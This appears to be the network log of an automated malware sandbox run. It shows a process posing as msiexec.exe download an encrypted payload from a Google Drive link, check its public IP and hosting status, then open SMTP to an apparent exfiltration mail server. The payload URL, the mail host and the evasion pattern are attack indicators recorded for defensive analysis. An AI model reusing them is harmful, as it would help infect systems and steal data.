                                                                                            Nov 5, 2024 16:36:55.702008963 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.702013969 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.702081919 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.704397917 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.704551935 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.704559088 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.704607010 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.706975937 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.707041979 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.707056999 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.707149029 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.709661007 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.709743023 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.709748030 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.709781885 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.712440968 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.712477922 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.712516069 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.712551117 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.714765072 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.714818001 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.714822054 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.714888096 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.717108965 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.717155933 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.717159986 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.717231035 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.719990015 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.720058918 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.720062971 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.720108032 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.721983910 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.722029924 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.722033024 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.722043037 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.722101927 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.722101927 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.724503994 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.724549055 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.724553108 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.724586010 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.726878881 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.726933956 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.726938963 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.726995945 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.729397058 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.729450941 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.729454994 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.729537010 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.768332958 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.768430948 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.768451929 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.768461943 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.768492937 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.768502951 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.768521070 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.768521070 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.768527985 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.768552065 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.768584967 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.768589020 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.768626928 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.768817902 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.768872976 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.768876076 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.768882990 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.768908024 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.768939972 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.768954039 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.768958092 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.768981934 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.769004107 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.769017935 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.769021988 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.769072056 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.769072056 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.769663095 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.769712925 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.769738913 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.769776106 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.769779921 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.769834042 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.769853115 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.769897938 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.769901037 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.769906998 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.769954920 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.769984961 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.769989967 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.770021915 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.770754099 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.770802975 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.770822048 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.770855904 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.770869017 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.770912886 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.770915985 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.770948887 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.770966053 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.770970106 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.770991087 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.771003962 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.771014929 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.771065950 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.771740913 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.771821022 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.771821976 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.771828890 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.771856070 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.771907091 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.771912098 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.771950006 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.772177935 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.772216082 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.772219896 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.772272110 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.793637037 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.793705940 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.793800116 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:56.692260981 CET49712443192.168.2.8104.26.13.205
                                                                                            Nov 5, 2024 16:36:56.692301989 CET44349712104.26.13.205192.168.2.8
                                                                                            Nov 5, 2024 16:36:56.692370892 CET49712443192.168.2.8104.26.13.205
                                                                                            Nov 5, 2024 16:36:56.693974972 CET49712443192.168.2.8104.26.13.205
                                                                                            Nov 5, 2024 16:36:56.693994999 CET44349712104.26.13.205192.168.2.8
                                                                                            Nov 5, 2024 16:36:57.546708107 CET44349712104.26.13.205192.168.2.8
                                                                                            Nov 5, 2024 16:36:57.546789885 CET49712443192.168.2.8104.26.13.205
                                                                                            Nov 5, 2024 16:36:57.549020052 CET49712443192.168.2.8104.26.13.205
                                                                                            Nov 5, 2024 16:36:57.549026966 CET44349712104.26.13.205192.168.2.8
                                                                                            Nov 5, 2024 16:36:57.549433947 CET44349712104.26.13.205192.168.2.8
                                                                                            Nov 5, 2024 16:36:57.552962065 CET49712443192.168.2.8104.26.13.205
                                                                                            Nov 5, 2024 16:36:57.595335960 CET44349712104.26.13.205192.168.2.8
                                                                                            Nov 5, 2024 16:36:57.733839035 CET44349712104.26.13.205192.168.2.8
                                                                                            Nov 5, 2024 16:36:57.733901978 CET44349712104.26.13.205192.168.2.8
                                                                                            Nov 5, 2024 16:36:57.733941078 CET49712443192.168.2.8104.26.13.205
                                                                                            Nov 5, 2024 16:36:57.737288952 CET49712443192.168.2.8104.26.13.205
                                                                                            Nov 5, 2024 16:36:57.749444962 CET4971380192.168.2.8208.95.112.1
                                                                                            Nov 5, 2024 16:36:57.754482031 CET8049713208.95.112.1192.168.2.8
                                                                                            Nov 5, 2024 16:36:57.754571915 CET4971380192.168.2.8208.95.112.1
                                                                                            Nov 5, 2024 16:36:57.754751921 CET4971380192.168.2.8208.95.112.1
                                                                                            Nov 5, 2024 16:36:57.759722948 CET8049713208.95.112.1192.168.2.8
                                                                                            Nov 5, 2024 16:36:58.348784924 CET8049713208.95.112.1192.168.2.8
                                                                                            Nov 5, 2024 16:36:58.403695107 CET4971380192.168.2.8208.95.112.1
                                                                                            Nov 5, 2024 16:36:59.951872110 CET4971380192.168.2.8208.95.112.1
                                                                                            Nov 5, 2024 16:36:59.957284927 CET8049713208.95.112.1192.168.2.8
                                                                                            Nov 5, 2024 16:36:59.957425117 CET4971380192.168.2.8208.95.112.1
                                                                                            Nov 5, 2024 16:37:00.413008928 CET49714587192.168.2.8208.91.199.223
                                                                                            Nov 5, 2024 16:37:00.417989969 CET58749714208.91.199.223192.168.2.8
                                                                                            Nov 5, 2024 16:37:00.418111086 CET49714587192.168.2.8208.91.199.223
                                                                                            Nov 5, 2024 16:37:00.994605064 CET58749714208.91.199.223192.168.2.8
                                                                                            Nov 5, 2024 16:37:00.995031118 CET49714587192.168.2.8208.91.199.223
                                                                                            Nov 5, 2024 16:37:01.000015974 CET58749714208.91.199.223192.168.2.8
                                                                                            Nov 5, 2024 16:37:01.151644945 CET58749714208.91.199.223192.168.2.8
                                                                                            Nov 5, 2024 16:37:01.155535936 CET49714587192.168.2.8208.91.199.223
                                                                                            Nov 5, 2024 16:37:01.160645962 CET58749714208.91.199.223192.168.2.8
                                                                                            Nov 5, 2024 16:37:01.315074921 CET58749714208.91.199.223192.168.2.8
                                                                                            Nov 5, 2024 16:37:01.315474033 CET49714587192.168.2.8208.91.199.223
                                                                                            Nov 5, 2024 16:37:01.320426941 CET58749714208.91.199.223192.168.2.8
                                                                                            Nov 5, 2024 16:37:01.477303028 CET58749714208.91.199.223192.168.2.8
                                                                                            Nov 5, 2024 16:37:01.479490995 CET49714587192.168.2.8208.91.199.223
                                                                                            Nov 5, 2024 16:37:01.484277964 CET58749714208.91.199.223192.168.2.8
                                                                                            Nov 5, 2024 16:37:01.637973070 CET58749714208.91.199.223192.168.2.8
                                                                                            Nov 5, 2024 16:37:01.638397932 CET49714587192.168.2.8208.91.199.223
                                                                                            Nov 5, 2024 16:37:01.645250082 CET58749714208.91.199.223192.168.2.8
                                                                                            Nov 5, 2024 16:37:01.820481062 CET58749714208.91.199.223192.168.2.8
                                                                                            Nov 5, 2024 16:37:01.820625067 CET49714587192.168.2.8208.91.199.223
                                                                                            Nov 5, 2024 16:37:01.825685978 CET58749714208.91.199.223192.168.2.8
                                                                                            Nov 5, 2024 16:37:01.979985952 CET58749714208.91.199.223192.168.2.8
                                                                                            Nov 5, 2024 16:37:01.980690956 CET49714587192.168.2.8208.91.199.223
                                                                                            Nov 5, 2024 16:37:01.980690956 CET49714587192.168.2.8208.91.199.223
                                                                                            Nov 5, 2024 16:37:01.980690956 CET49714587192.168.2.8208.91.199.223
                                                                                            Nov 5, 2024 16:37:01.980690956 CET49714587192.168.2.8208.91.199.223
                                                                                            Nov 5, 2024 16:37:01.985634089 CET58749714208.91.199.223192.168.2.8
                                                                                            Nov 5, 2024 16:37:01.985645056 CET58749714208.91.199.223192.168.2.8
                                                                                            Nov 5, 2024 16:37:01.985971928 CET58749714208.91.199.223192.168.2.8
                                                                                            Nov 5, 2024 16:37:01.985980988 CET58749714208.91.199.223192.168.2.8
                                                                                            Nov 5, 2024 16:37:02.274764061 CET58749714208.91.199.223192.168.2.8
                                                                                            Nov 5, 2024 16:37:02.325617075 CET49714587192.168.2.8208.91.199.223
                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Nov 5, 2024 16:36:49.783725977 CET5214853192.168.2.81.1.1.1
                                                                                            Nov 5, 2024 16:36:49.979630947 CET53521481.1.1.1192.168.2.8
                                                                                            Nov 5, 2024 16:36:51.363262892 CET6263453192.168.2.81.1.1.1
                                                                                            Nov 5, 2024 16:36:51.369998932 CET53626341.1.1.1192.168.2.8
                                                                                            Nov 5, 2024 16:36:56.673342943 CET5374453192.168.2.81.1.1.1
                                                                                            Nov 5, 2024 16:36:56.680632114 CET53537441.1.1.1192.168.2.8
                                                                                            Nov 5, 2024 16:36:57.740799904 CET5060553192.168.2.81.1.1.1
                                                                                            Nov 5, 2024 16:36:57.748543024 CET53506051.1.1.1192.168.2.8
                                                                                            Nov 5, 2024 16:36:59.952881098 CET6249753192.168.2.81.1.1.1
                                                                                            Nov 5, 2024 16:37:00.411468983 CET53624971.1.1.1192.168.2.8
                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                            Nov 5, 2024 16:36:49.783725977 CET192.168.2.81.1.1.10x48baStandard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                            Nov 5, 2024 16:36:51.363262892 CET192.168.2.81.1.1.10x9a76Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                            Nov 5, 2024 16:36:56.673342943 CET192.168.2.81.1.1.10x603bStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                            Nov 5, 2024 16:36:57.740799904 CET192.168.2.81.1.1.10x3bd4Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                            Nov 5, 2024 16:36:59.952881098 CET192.168.2.81.1.1.10x226cStandard query (0)smtp.santonswitchgears.comA (IP address)IN (0x0001)false
                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                            Nov 5, 2024 16:36:49.979630947 CET1.1.1.1192.168.2.80x48baNo error (0)drive.google.com142.250.185.238A (IP address)IN (0x0001)false
                                                                                            Nov 5, 2024 16:36:51.369998932 CET1.1.1.1192.168.2.80x9a76No error (0)drive.usercontent.google.com216.58.206.65A (IP address)IN (0x0001)false
                                                                                            Nov 5, 2024 16:36:56.680632114 CET1.1.1.1192.168.2.80x603bNo error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                                            Nov 5, 2024 16:36:56.680632114 CET1.1.1.1192.168.2.80x603bNo error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                                            Nov 5, 2024 16:36:56.680632114 CET1.1.1.1192.168.2.80x603bNo error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                                            Nov 5, 2024 16:36:57.748543024 CET1.1.1.1192.168.2.80x3bd4No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                            Nov 5, 2024 16:37:00.411468983 CET1.1.1.1192.168.2.80x226cNo error (0)smtp.santonswitchgears.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                            Nov 5, 2024 16:37:00.411468983 CET1.1.1.1192.168.2.80x226cNo error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                            Nov 5, 2024 16:37:00.411468983 CET1.1.1.1192.168.2.80x226cNo error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                            Nov 5, 2024 16:37:00.411468983 CET1.1.1.1192.168.2.80x226cNo error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                            Nov 5, 2024 16:37:00.411468983 CET1.1.1.1192.168.2.80x226cNo error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                            • drive.google.com
                                                                                            • drive.usercontent.google.com
                                                                                            • api.ipify.org
                                                                                            • ip-api.com
                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            0192.168.2.849713208.95.112.1807048C:\Windows\SysWOW64\msiexec.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 16:36:57.754751921 CET80OUTGET /line/?fields=hosting HTTP/1.1
                                                                                            Host: ip-api.com
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 16:36:58.348784924 CET174INHTTP/1.1 200 OK
                                                                                            Date: Tue, 05 Nov 2024 15:36:58 GMT
                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                            Content-Length: 5
                                                                                            Access-Control-Allow-Origin: *
                                                                                            X-Ttl: 60
                                                                                            X-Rl: 44
                                                                                            Data Raw: 74 72 75 65 0a
                                                                                            Data Ascii: true


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            0192.168.2.849710142.250.185.2384437048C:\Windows\SysWOW64\msiexec.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-11-05 15:36:50 UTC208OUTGET /uc?export=download&id=1cPTY4gwGJX8CNpYT9E3V1C8xeZUU6szo HTTP/1.1
                                                                                            User-Agent: 5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                            Host: drive.google.com
                                                                                            Cache-Control: no-cache
                                                                                            2024-11-05 15:36:51 UTC1610INHTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Tue, 05 Nov 2024 15:36:51 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=1cPTY4gwGJX8CNpYT9E3V1C8xeZUU6szo&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'nonce-fcOa7KbtVZTX5ClyjGAXeQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            1192.168.2.849711216.58.206.654437048C:\Windows\SysWOW64\msiexec.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-11-05 15:36:52 UTC250OUTGET /download?id=1cPTY4gwGJX8CNpYT9E3V1C8xeZUU6szo&export=download HTTP/1.1
                                                                                            User-Agent: 5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            2024-11-05 15:36:55 UTC4920INHTTP/1.1 200 OK
                                                                                            Content-Type: application/octet-stream
                                                                                            Content-Security-Policy: sandbox
                                                                                            Content-Security-Policy: default-src 'none'
                                                                                            Content-Security-Policy: frame-ancestors 'none'
                                                                                            X-Content-Security-Policy: sandbox
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Cross-Origin-Embedder-Policy: require-corp
                                                                                            Cross-Origin-Resource-Policy: same-site
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Content-Disposition: attachment; filename="BMfiTNbHYgkF10.bin"
                                                                                            Access-Control-Allow-Origin: *
                                                                                            Access-Control-Allow-Credentials: false
                                                                                            Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                            Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                            Accept-Ranges: bytes
                                                                                            Content-Length: 246336
                                                                                            Last-Modified: Wed, 16 Oct 2024 13:31:36 GMT
                                                                                            X-GUploader-UploadID: AHmUCY1NRU9nrN_n3Y7PHy6ZzZzCPpQRhWNoNHDFNBfBTE7eOwhOC4slbeR37k9bwE5m0FgCT_2CMmxSPg
                                                                                            Date: Tue, 05 Nov 2024 15:36:55 GMT
                                                                                            Expires: Tue, 05 Nov 2024 15:36:55 GMT
                                                                                            Cache-Control: private, max-age=0
                                                                                            X-Goog-Hash: crc32c=CEKWyw==
                                                                                            Server: UploadServer
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close
                                                                                            2024-11-05 15:36:55 UTC4920INData Raw: 3e d1 13 0c 6b 92 43 1c b4 22 85 32 4b ce d3 ca b7 8e 59 9f 9a 3b 10 b7 fb c9 01 fa e0 e2 a7 94 93 09 05 a0 6e 57 ba f4 2e c9 f9 db 89 25 dd 41 b0 06 e7 5b 6c 7a c9 90 ef 8b 72 53 eb 7b b4 91 f9 84 53 9e 08 7a 1d b7 21 08 49 5f 93 a1 c8 59 ac 94 ea cb ef eb 7c 70 26 3b d6 f7 e6 5e 1e cd c5 54 86 7a c1 e3 a0 cd 16 48 84 b9 ab af 39 52 01 f5 94 57 c0 87 8c 41 94 b2 26 b4 e9 fe 0b 43 32 2d 82 d8 89 eb 38 75 6d 4e fc cc 9a ea ef 00 28 04 8d 41 af 5c a0 95 12 3f 89 9b ad 3b 05 41 b5 fc e7 4e b0 0c bd ae 28 f6 50 7b ce 94 d4 dd 26 34 53 7d 8a 72 5f 0d b8 42 d1 1b e6 a0 af 8e b3 68 c9 db f2 17 3d ad 1c e1 3e f1 3c 5b c8 86 dd 8d ee 41 4b 20 fe 4b 31 37 26 50 31 86 8e 93 d3 4a e8 76 33 64 3e 4c 32 99 c0 f7 54 26 5f 08 1a 8b 7f a2 63 52 c5 4d 8b 13 d1 34 14 aa 50
                                                                                            Data Ascii: >kC"2KY;nW.%A[lzrS{Sz!I_Y|p&;^TzH9RWA&C2-8umN(A\?;AN(P{&4S}r_Bh=><[AK K17&P1Jv3d>L2T&_cRM4P
                                                                                            2024-11-05 15:36:55 UTC4854INData Raw: 3b b9 d5 28 f4 e0 e9 e9 44 df ee 06 76 7f 5d 99 37 85 90 9f a9 c1 7e 3f 54 0a 1b 6e 71 49 fc 36 03 51 fb 51 63 36 24 2b 18 a0 db 9d 43 86 55 06 1e bc da 43 d1 58 1c ac d9 83 78 ac 5c a8 24 25 ab ec 25 c3 fd e5 b7 31 7f 34 f7 7d 76 43 f3 95 b3 f2 24 ea d6 d9 55 83 a4 8a 2b 97 0a f3 97 66 3d ee 7c 6a 6f fd a3 54 05 27 d3 53 1f 68 4d 77 b6 a4 fa 69 e3 70 00 cc aa 0c 2a 32 53 8b 2a 89 c9 8a e4 db 31 32 6a 66 14 2e a2 56 66 ee 69 a4 d2 7c df d6 5c 8a 84 1d 2a 34 dd d5 91 85 93 ef 2d 86 06 79 e1 ab 0a 0e 55 b4 c0 e7 47 0d f8 1e 82 c9 b1 7a 7b 4f ca 32 b9 86 ec cd d2 99 15 60 11 f6 09 41 f1 27 29 8e 77 59 9f f0 61 3b d6 6f 70 6e 25 a0 02 82 75 d6 e1 e2 a3 24 ac 69 06 d4 9d ae d1 62 73 99 db 2b 86 2b 8e 9d ef 68 d2 8b 83 e7 f1 b4 5e 50 41 5f 62 a0 3b 36 d0 ba a7
                                                                                            Data Ascii: ;(Dv]7~?TnqI6QQc6$+CUCXx\$%%14}vC$U+f=|joT'ShMwip*2S*12jf.Vfi|\*4-yUGz{O2`A')wYa;opn%u$ibs++h^PA_b;6
